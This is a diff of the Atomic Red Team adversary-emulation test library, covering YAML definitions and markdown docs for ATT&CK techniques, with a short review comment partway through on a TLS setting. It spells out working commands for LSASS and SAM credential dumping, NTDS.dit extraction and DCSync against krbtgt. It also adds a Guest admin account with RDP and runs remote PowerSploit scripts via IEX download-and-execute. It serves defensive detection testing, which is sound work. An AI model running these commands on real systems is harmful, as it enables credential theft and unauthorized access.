bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
msiexec /i "#{radmin_installer}" /qn
executor:
name: command_prompt
elevation_required: true
command: '"#{radmin_exe}"'
T1153:
technique:
id: attack-pattern--45d84c8b-c1e2-474d-a14d-69b5de0a2bc0
@@ -60546,7 +61137,8 @@ execution:
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
-like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
@@ -60583,7 +61175,8 @@ execution:
'
executor:
command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\"
-officeProduct \"Word\" -sub \"Extract\"\n"
cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin"
@@ -62428,7 +63021,41 @@ lateral-movement:
x_mitre_remote_support: true
x_mitre_contributors:
- Shane Tully, @securitygypsy
atomic_tests: []
identifier: T1072
atomic_tests:
- name: Radmin Viewer Utility
auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
description: 'An adversary may use Radmin Viewer Utility to remotely control
Windows device, this will start the radmin console.
'
supported_platforms:
- windows
input_arguments:
radmin_installer:
description: Radmin Viewer installer
type: Path
default: "%TEMP%\\RadminViewer.msi"
radmin_exe:
description: The radmin.exe executable from RadminViewer.msi
type: Path
default: "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe"
dependencies:
- description: 'Radmin Viewer Utility must be installed at specified location
(#{radmin_exe})
'
prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
'
get_prereq_command: |
echo Downloading radmin installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
msiexec /i "#{radmin_installer}" /qn
executor:
name: command_prompt
elevation_required: true
command: '"#{radmin_exe}"'
T1080:
technique:
id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c
@@ -64253,6 +64880,55 @@ command-and-control:
del #{local_path} >nul 2>&1
del %temp%\MpCmdRun.log >nul 2>&1
name: command_prompt
- name: whois file download
auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
description: 'Download a remote file using the whois utility
'
supported_platforms:
- linux
- macos
input_arguments:
remote_host:
description: Remote hostname or IP address
type: String
default: localhost
remote_port:
description: Remote port to connect to
type: Integer
default: 8443
output_file:
description: Path of file to save output to
type: Path
default: "/tmp/T1105.whois.out"
query:
description: Query to send to remote server
type: String
default: Hello from Atomic Red Team test T1105
timeout:
description: Timeout period before ending process (seconds)
type: Integer
default: 1
dependencies:
- description: 'The whois and timeout commands must be present
'
prereq_command: 'which whois && which timeout
'
get_prereq_command: 'echo "Please install timeout and the whois package"
'
executor:
name: sh
elevation_required: false
command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p
#{remote_port} "#{query}" > #{output_file}
'
cleanup_command: 'rm -f #{output_file}
'
T1090.001:
technique:
external_references:
@@ -66948,9 +67624,9 @@ initial-access:
atomic_tests:
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
description: After execution the Default Guest account will be enabled (Active)
and added to Administrators and Remote Desktop Users Group, and desktop will
allow multiple RDP connections
description: |
After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
and desktop will allow multiple RDP connections.
supported_platforms:
- windows
input_arguments:
@@ -66962,6 +67638,10 @@ initial-access:
description: Specify the guest password
type: String
default: Password123!
remove_rdp_access_during_cleanup:
description: Set to 1 if you want the cleanup to remove RDP access to machine
type: Integer
default: 0
executor:
command: |-
net user #{guest_user} /active:yes
@@ -66974,8 +67654,9 @@ initial-access:
net user #{guest_user} /active:no >nul 2>&1
net localgroup administrators #{guest_user} /delete >nul 2>&1
net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
name: command_prompt
elevation_required: true
T1078.002:
@@ -67642,6 +68323,7 @@ initial-access:
description: |
The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com).
The below will successfully download the macro-enabled Excel file to the current location.
File is downloaded to the %temp% folder.
supported_platforms:
- windows
executor:
@@ -67650,13 +68332,13 @@ initial-access:
return 'Please install Microsoft Excel before running this test.'
}
else{
$url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
$url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
$fileName = 'PhishingAttachment.xlsm'
New-Item -Type File -Force -Path $fileName | out-null
$wc = New-Object System.Net.WebClient
$wc.Encoding = [System.Text.Encoding]::UTF8
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
($wc.DownloadString("$url")) | Out-File $fileName
Invoke-WebRequest -Uri $url -OutFile $fileName
}
name: powershell
- name: Word spawned a command shell and used an IP address in the command line
@@ -67695,7 +68377,8 @@ initial-access:
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
+73 -19
@@ -65,10 +65,14 @@ If you see a message saying \"wce.exe is not recognized as an internal or extern
**Supported Platforms:** Windows
**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting data should be placed | Path | %temp%&#92;wce-output.txt|
| wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933|
@@ -94,11 +98,12 @@ del "#{output_file}" >nul 2>&1
##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
@@ -124,10 +129,14 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
**Supported Platforms:** Windows
**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
@@ -151,10 +160,11 @@ del "#{output_file}" >nul 2> nul
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -175,6 +185,10 @@ Upon successful execution, you should see the following file created $env:TEMP\l
**Supported Platforms:** Windows
**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
@@ -208,10 +222,14 @@ If you see a message saying \"The system cannot find the path specified.\", try
**Supported Platforms:** Windows
**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;Outflank-Dumpert.exe|
@@ -234,10 +252,11 @@ del C:\windows\temp\dumpert.dmp >nul 2> nul
##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
```
@@ -255,6 +274,10 @@ Manager and administrative permissions.
**Supported Platforms:** Windows
**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
#### Run it with these steps!
@@ -285,10 +308,14 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c
**Supported Platforms:** Windows
**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path of the Lsass dump | Path | %tmp%&#92;lsass.DMP|
| mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;mimikatz.exe|
@@ -308,10 +335,11 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
$request = [System.Net.WebRequest]::Create($url)
$response = $request.GetResponse()
@@ -328,7 +356,7 @@ Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
##### Description: Lsass dump must exist at specified location (#{input_file})
##### Check Prereq Commands:
```powershell
cmd /c "if not exist #{input_file} (exit /b 1)"
cmd /c "if not exist #{input_file} (exit /b 1)"
```
##### Get Prereq Commands:
```powershell
@@ -351,6 +379,10 @@ Successful execution of this test will display multiple useranames and passwords
**Supported Platforms:** Windows
**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
@@ -369,7 +401,7 @@ pypykatz live lsa
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
@@ -379,7 +411,7 @@ echo "Python 3 must be installed manually"
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
@@ -389,7 +421,7 @@ echo "PIP must be installed manually"
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
@@ -410,6 +442,10 @@ Upon successful execution, you should see the following file created $env:SYSTEM
**Supported Platforms:** Windows
**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
@@ -417,6 +453,7 @@ Upon successful execution, you should see the following file created $env:SYSTEM
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
```
@@ -443,10 +480,14 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
**Supported Platforms:** Windows
**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
@@ -470,7 +511,7 @@ del "#{output_file}" >nul 2> nul
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -495,10 +536,14 @@ Or, if you try to run the test without the required administrative privleges you
**Supported Platforms:** Windows
**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
@@ -525,10 +570,14 @@ This test uses the technique describe in this tweet
**Supported Platforms:** Windows
**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;dotnet-lsass.dmp|
| createdump_exe | Path of createdump.exe executable | Path | C:&#92;Program Files&#92;dotnet&#92;shared&#92;Microsoft.NETCore.App&#92;5.*.*&#92;createdump.exe|
@@ -556,7 +605,7 @@ del #{output_file}
##### Description: Computer must have createdump.exe from .Net 5
##### Check Prereq Commands:
```powershell
if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -579,10 +628,14 @@ Upon successful execution, you should see the following file created $env:TEMP\l
**Supported Platforms:** Windows
**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xordump_exe | Path to xordump | Path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|
@@ -606,10 +659,11 @@ Remove-Item ${output_file} -ErrorAction Ignore
##### Description: Computer must have xordump.exe
##### Check Prereq Commands:
```powershell
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
```
+6
@@ -38,6 +38,7 @@ atomic_tests:
if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
get_prereq_command: |
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
@@ -78,6 +79,7 @@ atomic_tests:
prereq_command: |
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -129,6 +131,7 @@ atomic_tests:
prereq_command: |
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
executor:
@@ -183,6 +186,7 @@ atomic_tests:
prereq_command: |
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
$request = [System.Net.WebRequest]::Create($url)
$response = $request.GetResponse()
@@ -256,6 +260,7 @@ atomic_tests:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: |
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
@@ -382,6 +387,7 @@ atomic_tests:
prereq_command: |
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
executor:
command: |
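Review bot: The `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` line added in the six hunks of this file (the wce, Procdump, Dumpert, Mimikatz, Out-Minidump and xordump blocks) assigns the process-wide protocol set rather than extending it, so on a host whose runtime default already allows a newer protocol the assignment narrows what every later request in that PowerShell session can negotiate, and nothing in the cleanup restores the previous value. Adding TLS 1.2 without dropping anything keeps the intent of the change: `[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12`. Separately, the wce block verifies its download with Invoke-WebRequestVerifyHash while the Procdump, Dumpert and xordump blocks still write whatever Invoke-WebRequest returns straight to the prereq path; that gap predates this commit, but since these lines are being touched a short comment such as `# NOTE: download is not hash-verified; pin or verify before relying on it` would flag it for the next editor.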
+20 -4
@@ -44,6 +44,10 @@ Upon successful execution of this test, you will find three files named, sam, sy
**Supported Platforms:** Windows
**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
@@ -76,6 +80,10 @@ Parses registry hives to obtain stored credentials
**Supported Platforms:** Windows
**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
@@ -94,7 +102,7 @@ pypykatz live registry
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
@@ -104,7 +112,7 @@ echo "Python 3 must be installed manually"
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
@@ -114,7 +122,7 @@ echo "PIP must be installed manually"
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
@@ -134,10 +142,14 @@ This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
**Supported Platforms:** Windows
**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM|
| file_name | Name of the copied file | String | SAM|
@@ -169,6 +181,10 @@ Executes a hashdump by reading the hasshes from the registry.
**Supported Platforms:** Windows
**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
+36 -12
@@ -37,10 +37,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
**Supported Platforms:** Windows
**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
@@ -59,7 +63,7 @@ vssadmin.exe create shadow /for=#{drive_letter}
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
@@ -84,10 +88,14 @@ This test must be executed on a Windows Domain Controller.
**Supported Platforms:** Windows
**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vsc_name | Name of Volume Shadow Copy | String | &#92;&#92;?&#92;GLOBALROOT&#92;Device&#92;HarddiskVolumeShadowCopy1|
| extract_path | Path for extracted NTDS.dit | Path | C:&#92;Windows&#92;Temp|
@@ -115,7 +123,7 @@ del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
@@ -124,7 +132,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
##### Description: Volume shadow copy must exist
##### Check Prereq Commands:
```cmd
if not exist #{vsc_name} (exit /b 1)
if not exist #{vsc_name} (exit /b 1)
```
##### Get Prereq Commands:
```cmd
@@ -133,7 +141,7 @@ echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with
##### Description: Extract path must exist
##### Check Prereq Commands:
```cmd
if not exist #{extract_path} (exit /b 1)
if not exist #{extract_path} (exit /b 1)
```
##### Get Prereq Commands:
```cmd
@@ -158,10 +166,14 @@ Upon successful completion, you will find a copy of the ntds.dit file in the C:\
**Supported Platforms:** Windows
**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;ntds_T1003|
@@ -185,7 +197,7 @@ rmdir /q /s #{output_folder} >nul 2>&1
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
@@ -206,10 +218,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
**Supported Platforms:** Windows
**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
@@ -228,7 +244,7 @@ wmic shadowcopy call create Volume=#{drive_letter}
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
@@ -249,10 +265,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
**Supported Platforms:** Windows
**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
@@ -280,10 +300,14 @@ The Active Directory database NTDS.dit may be dumped by creating a symlink to Vo
**Supported Platforms:** Windows
**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
| symlink_path | symlink path | String | C:&#92;Temp&#92;vssstore|
+6 -2
@@ -20,10 +20,14 @@ https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%2
**Supported Platforms:** Windows
**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| psexec_exe | Path to PsExec executable | Path | PathToAtomicsFolder&#92;T1003.004&#92;bin&#92;PsExec.exe|
@@ -46,7 +50,7 @@ del %temp%\secrets >nul 2> nul
##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}
if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+6 -2
@@ -22,10 +22,14 @@ Privileges required: domain admin or domain controller account (by default), or
**Supported Platforms:** Windows
**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Targeted domain | string | example.com|
| user | Targeted user | string | krbtgt|
@@ -47,7 +51,7 @@ Privileges required: domain admin or domain controller account (by default), or
##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+142
@@ -0,0 +1,142 @@
# T1003.007 - Proc Filesystem
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007)
<blockquote>Adversaries may gather credentials from information stored in the Proc filesystem or <code>/proc</code>. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local)
- [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local)
